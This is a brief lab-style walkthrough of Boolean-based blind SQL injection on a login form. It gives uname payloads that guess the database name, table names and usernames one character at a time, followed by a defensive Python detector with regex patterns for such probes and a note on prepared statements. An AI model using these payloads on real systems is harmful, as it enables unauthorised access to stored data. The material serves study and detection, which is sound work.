1. Various tests were tried and none of them returned an error. The universal (always-true) statement logs in successfully.
2. There is no echoed output, so use Boolean-based blind injection.
3. The password is wrong, so use "or"; it works on a principle similar to 1=1.
Syntax:
1. Guess the database name:
uname=111' or(select ascii(substr(database(),1,1))>100)#&passwd=&submit=Submit
2. Guess the table name:
( select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)
3. Guess the field:
select * from *
uname=1' or (select ascii(substr((select username from users limit 0,1),1,1) )<100)#&passwd=&submit=Submit
On the importance of limit 0,1:
# limit 0,1: start from row 0 of the table and read only one row.
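From the defender's side, requests like the ones above can be spotted in a request log because they repeat one template and change only the numbers. The following is an added example, not code from the original post; the log format, client addresses, sample bodies and function names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Patterns taken from the payload shapes shown on this page.
SIGNALS = {
    "char_compare": re.compile(r"ascii\s*\(\s*substr", re.I),
    "schema_enum": re.compile(r"information_schema", re.I),
    "quote_or": re.compile(r"'\s*or\s*\(", re.I),
    "trailing_comment": re.compile(r"(#|--\s*)$"),
}

# Constructed sample log of (client address, POST body); not real traffic.
SAMPLE_REQUESTS = [
    ("192.0.2.10", "uname=o'connor&passwd=hunter2&submit=Submit"),
    ("192.0.2.20", "uname=111' or(select ascii(substr(database(),1,1))>100)#&passwd=&submit=Submit"),
    ("192.0.2.20", "uname=111' or(select ascii(substr(database(),1,1))>110)#&passwd=&submit=Submit"),
    ("192.0.2.20", "uname=111' or(select ascii(substr(database(),1,1))>115)#&passwd=&submit=Submit"),
    ("192.0.2.10", "uname=alice&passwd=wrong&submit=Submit"),
]


def signals(value):
    """Names of the injection indicators present in one field value."""
    return [name for name, rx in SIGNALS.items() if rx.search(value)]


def find_blind_probing(requests, field="uname", min_variants=3):
    """Flag clients that repeat one suspicious template with varying numbers.

    Boolean-based blind extraction needs many requests that differ only in the
    guessed position or character code, so digits are collapsed to N and the
    distinct raw values behind each (client, template) pair are counted.
    """
    variants = defaultdict(set)
    for client, body in requests:
        for value in parse_qs(body).get(field, []):
            if len(signals(value)) >= 2:
                template = re.sub(r"\d+", "N", value.lower())
                variants[(client, template)].add(value)
    return {k: len(v) for k, v in variants.items() if len(v) >= min_variants}


if __name__ == "__main__":
    for (client, template), count in find_blind_probing(SAMPLE_REQUESTS).items():
        print(f"{client}: {count} probes matching {template}")
```

Detection of this kind is a monitoring aid only; the fix for the login form itself is to pass uname and passwd as bound parameters of a prepared statement.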
sql injection boolean based blind injection